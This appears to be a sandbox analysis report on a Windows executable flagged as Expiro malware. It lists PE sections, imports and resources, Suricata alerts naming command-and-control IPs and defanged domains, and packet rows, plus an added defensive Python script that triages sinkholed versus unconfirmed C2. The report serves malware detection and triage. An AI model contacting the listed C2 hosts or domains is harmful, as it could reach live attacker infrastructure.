                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e000 | 0x25ba | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7a000 | 0xbae00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x73000 | 0x67c8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x72000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6e70c | 0x5e0 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5c080 | 0x5c200 | ef9f6beac02a22c14de0580f88f1afcf | False | 0.522202552578019 | data | 6.522155536157196 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x5e000 | 0x79c | 0x800 | 379e45a43a773355cc28b84791b9a13e | False | 0.60302734375 | data | 6.058068981530265 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x5f000 | 0xab18 | 0xac00 | 49a3c371488ab4e03e4acff1c3710f0a | False | 0.08146348110465117 | data | 5.80716710843227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x6a000 | 0x36c4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6e000 | 0x25ba | 0x2600 | b427f673ebec4fc783ee1f0f21514034 | False | 0.3234991776315789 | data | 5.220230392791352 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x71000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x72000 | 0x18 | 0x200 | abe671229d70eaf9fcf89a57bca9cee6 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "G" | 0.20544562813451883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x73000 | 0x67c8 | 0x6800 | 53a21ee01ba4a4a1d20690e3b048aee4 | False | 0.6426532451923077 | data | 6.684698004911764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x7a000 | 0xbae00 | 0xbae00 | 47207f56b0f6a5655797a272ae87d231 | False | 0.503993781354515 | data | 7.490536162426885 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x7aac4 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x7abf8 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x7ad2c | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x7ae60 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x7af94 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x7b0c8 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x7b1fc | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x7b330 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x7b500 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x7b6e4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x7b8b4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x7ba84 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x7bc54 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x7be24 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x7bff4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x7c1c4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x7c394 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x7c564 | 0xb397c | Device independent bitmap graphic, 798 x 307 x 24, image size 735572, resolution 3780 x 3780 px/m | English | United States | 0.5120430335557332
RT_BITMAP | 0x12fee0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x12ffc8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 15118 x 15118 px/m | | | 0.11639004149377594
RT_DIALOG | 0x132570 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x1325c4 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x132618 | 0x34 | data | | | 0.5
RT_STRING | 0x13264c | 0x2b0 | data | | | 0.4752906976744186
RT_STRING | 0x1328fc | 0xb8 | data | | | 0.6793478260869565
RT_STRING | 0x1329b4 | 0xec | data | | | 0.6398305084745762
RT_STRING | 0x132aa0 | 0x2f0 | data | | | 0.4587765957446808
RT_STRING | 0x132d90 | 0x3d0 | data | | | 0.38729508196721313
RT_STRING | 0x133160 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x1334d0 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x13389c | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x133ab0 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x133b7c | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x133d10 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x1340d4 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x13440c | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x1346a0 | 0x10 | data | | | 1.5
RT_RCDATA | 0x1346b0 | 0x320 | data | | | 0.68625
RT_RCDATA | 0x1349d0 | 0x1e5 | Delphi compiled form 'TForm1' | | | 0.6969072164948453
RT_GROUP_CURSOR | 0x134bb8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x134bcc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x134be0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x134bf4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x134c08 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x134c1c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134c300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_ICON0x134c440x14data1.25
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIconFromResourceEx, CreateIcon, CopyIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExW, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, IsBadStringPtrA, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumResourceNamesA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ExtractIconA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T08:12:12.573946+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49708 | 198.252.105.91 | 443 | TCP
2024-11-26T08:12:28.611072+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.10 | 49744 | TCP
2024-11-26T08:12:28.611072+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.10 | 49744 | TCP
2024-11-26T08:12:31.363417+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.10 | 49753 | 54.244.188.177 | 80 | TCP
2024-11-26T08:12:32.627342+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.10 | 49757 | TCP
2024-11-26T08:12:32.627342+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.10 | 49757 | TCP
2024-11-26T08:12:37.384307+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.10 | 54094 | 1.1.1.1 | 53 | UDP
2024-11-26T08:12:37.495356+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.10 | 49773 | TCP
2024-11-26T08:12:37.495356+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.10 | 49773 | TCP
2024-11-26T08:12:40.975891+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.10 | 55974 | 1.1.1.1 | 53 | UDP
2024-11-26T08:12:41.335413+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.10 | 55012 | 1.1.1.1 | 53 | UDP
2024-11-26T08:12:47.189936+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.10 | 52903 | 1.1.1.1 | 53 | UDP
2024-11-26T08:13:07.874186+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.10 | 54498 | 1.1.1.1 | 53 | UDP
2024-11-26T08:13:10.876049+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.10 | 64255 | 1.1.1.1 | 53 | UDP
2024-11-26T08:13:32.576759+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.10 | 49867 | 82.112.184.197 | 80 | TCP
2024-11-26T08:14:33.633509+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.10 | 50012 | 18.141.10.107 | 80 | TCP
2024-11-26T08:14:39.886220+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.246.200.160 | 80 | 192.168.2.10 | 50015 | TCP
2024-11-26T08:14:39.886220+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.246.200.160 | 80 | 192.168.2.10 | 50015 | TCP
2024-11-26T08:14:41.732453+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.10 | 50017 | TCP
2024-11-26T08:14:41.732453+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.10 | 50017 | TCP
2024-11-26T08:14:42.324768+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.10 | 50016 | TCP
2024-11-26T08:14:42.324768+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.10 | 50016 | TCP
2024-11-26T08:14:44.673882+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.10 | 50018 | TCP
2024-11-26T08:14:44.673882+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.10 | 50018 | TCP
2024-11-26T08:14:53.634411+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 35.164.78.200 | 80 | 192.168.2.10 | 50029 | TCP
2024-11-26T08:14:53.634411+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 35.164.78.200 | 80 | 192.168.2.10 | 50029 | TCP
2024-11-26T08:14:55.447711+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.10 | 50031 | TCP
2024-11-26T08:14:55.447711+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.10 | 50031 | TCP
2024-11-26T08:15:39.005596+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.10 | 50077 | 18.246.231.120 | 80 | TCP
2024-11-26T08:15:39.125752+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.246.231.120 | 80 | 192.168.2.10 | 50077 | TCP
2024-11-26T08:15:39.125752+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.246.231.120 | 80 | 192.168.2.10 | 50077 | TCP
2024-11-26T08:15:41.242825+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.254.94.185 | 80 | 192.168.2.10 | 50078 | TCP
2024-11-26T08:15:41.242825+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.254.94.185 | 80 | 192.168.2.10 | 50078 | TCP
2024-11-26T08:15:48.948405+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.211.97.45 | 80 | 192.168.2.10 | 50086 | TCP
2024-11-26T08:15:48.948405+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.211.97.45 | 80 | 192.168.2.10 | 50086 | TCP
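The Suricata rows above pair outbound "Expiro.NDO CnC Activity" hits with inbound "AnubisNetworks Sinkhole Cookie Value" hits from the same remote address (for example 18.246.231.120 on local port 50077): the infection is real, but that C2 has already been sinkholed, so blocking the address tells you nothing about the live operator. The script below is an added example, not Joe Sandbox's tooling or Suricata's own code. It takes Suricata eve.json "alert" events (field names are Suricata's; the records are constructed here, modelled on the rows in this report, and the home address 192.168.2.10 is assumed to be the analysis VM) and separates sinkholed C2 from C2 that produced no sinkhole evidence, while collecting the Expiro domains named in the DNS signatures.

```python
"""Triage Suricata alerts from a sandbox run: sinkholed C2 versus unconfirmed C2.

Constructed example, not part of the Joe Sandbox report or its tooling. The
records are hand-built eve.json 'alert' events modelled on the report's rows.
"""
import json
import re
from collections import defaultdict

HOME_NET = "192.168.2.10"  # assumed: the analysis VM seen in the report's alert rows


def _rec(ts, sid, sig, sev, src, sport, dst, dport, proto):
    """Build one eve.json alert line (constructed sample data)."""
    return json.dumps({
        "timestamp": ts, "event_type": "alert", "proto": proto,
        "src_ip": src, "src_port": sport, "dest_ip": dst, "dest_port": dport,
        "alert": {"signature_id": sid, "signature": sig, "severity": sev},
    })


SNKZ = "ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz"
CNC = "ETPRO MALWARE Win32/Expiro.NDO CnC Activity"
DNS = "ET MALWARE DNS Query to Expiro Related Domain ({})"

EVE_LINES = [  # constructed, modelled on the report's Suricata rows
    _rec("2024-11-26T08:12:12.573946+0100", 2028371,
         "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3,
         HOME_NET, 49708, "198.252.105.91", 443, "TCP"),
    _rec("2024-11-26T08:12:28.611072+0100", 2018141, SNKZ, 1, "54.244.188.177", 80, HOME_NET, 49744, "TCP"),
    _rec("2024-11-26T08:12:31.363417+0100", 2850851, CNC, 1, HOME_NET, 49753, "54.244.188.177", 80, "TCP"),
    _rec("2024-11-26T08:12:37.384307+0100", 2051648, DNS.format("przvgke .biz"), 1, HOME_NET, 54094, "1.1.1.1", 53, "UDP"),
    _rec("2024-11-26T08:12:41.335413+0100", 2051649, DNS.format("knjghuig .biz"), 1, HOME_NET, 55012, "1.1.1.1", 53, "UDP"),
    _rec("2024-11-26T08:13:32.576759+0100", 2850851, CNC, 1, HOME_NET, 49867, "82.112.184.197", 80, "TCP"),
    _rec("2024-11-26T08:15:39.005596+0100", 2850851, CNC, 1, HOME_NET, 50077, "18.246.231.120", 80, "TCP"),
    _rec("2024-11-26T08:15:39.125752+0100", 2018141, SNKZ, 1, "18.246.231.120", 80, HOME_NET, 50077, "TCP"),
]

SINKHOLE_RE = re.compile(r"\bSinkhole\b", re.IGNORECASE)
CNC_RE = re.compile(r"\bCnC\b", re.IGNORECASE)
# ET writes the queried domain in parentheses with a defanging space before the TLD.
DNS_DOMAIN_RE = re.compile(r"DNS Query to .*?\(([^)]+)\)")


def parse_eve(lines):
    """Yield alert events from eve.json lines; skip other event types and bad JSON."""
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("event_type") == "alert":
            yield rec


def triage(lines, home_net=HOME_NET):
    """Group alerts by remote IP: 'sinkhole' if a sinkhole-cookie signature fired on
    traffic from it, 'cnc' if a CnC signature fired on traffic to it. Domains from
    DNS alerts are collected separately with the defanging space removed."""
    remotes = defaultdict(lambda: {"sinkhole": False, "cnc": False, "local_ports": set()})
    domains = set()
    for rec in parse_eve(lines):
        sig = rec["alert"]["signature"]
        m = DNS_DOMAIN_RE.search(sig)
        if m:
            domains.add(m.group(1).replace(" ", ""))
            continue
        if rec["src_ip"] == home_net:
            remote, local_port = rec["dest_ip"], rec["src_port"]
        elif rec["dest_ip"] == home_net:
            remote, local_port = rec["src_ip"], rec["dest_port"]
        else:
            continue  # neither side is the monitored host
        entry = remotes[remote]
        entry["local_ports"].add(local_port)
        if SINKHOLE_RE.search(sig):
            entry["sinkhole"] = True
        if CNC_RE.search(sig):
            entry["cnc"] = True
    return {"remotes": dict(remotes), "expiro_domains": sorted(domains)}


def sinkholed_cnc(result):
    """C2 addresses that answered with a sinkhole cookie: host infected, operator gone."""
    return sorted(ip for ip, e in result["remotes"].items() if e["cnc"] and e["sinkhole"])


def unconfirmed_cnc(result):
    """C2 addresses with no sinkhole evidence: treat as possibly live."""
    return sorted(ip for ip, e in result["remotes"].items() if e["cnc"] and not e["sinkhole"])


if __name__ == "__main__":
    r = triage(EVE_LINES)
    print("sinkholed C2:", sinkholed_cnc(r))
    print("unconfirmed C2:", unconfirmed_cnc(r))
    print("Expiro domains:", r["expiro_domains"])
```

On the constructed input this reports 18.246.231.120 and 54.244.188.177 as sinkholed C2, 82.112.184.197 as C2 with no sinkhole evidence, and przvgke.biz and knjghuig.biz as the queried domains. Correlating by remote address rather than by flow matters because the sinkhole reply and the CnC hit do not always share a local port (54.244.188.177 is hit on 49753 and answers on 49744 in the report), and the host-side conclusion is the same either way: the machine is infected and needs cleanup regardless of who now owns the C2 address.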
                                                                                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.161344051 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.161359072 CET44349707198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.161617994 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.162692070 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.162815094 CET44349707198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.162900925 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.220637083 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.220690012 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.220796108 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.222457886 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.222471952 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.573776960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.573945999 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.590255976 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.590275049 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.590764999 CET44349708198.252.105.91192.168.2.10
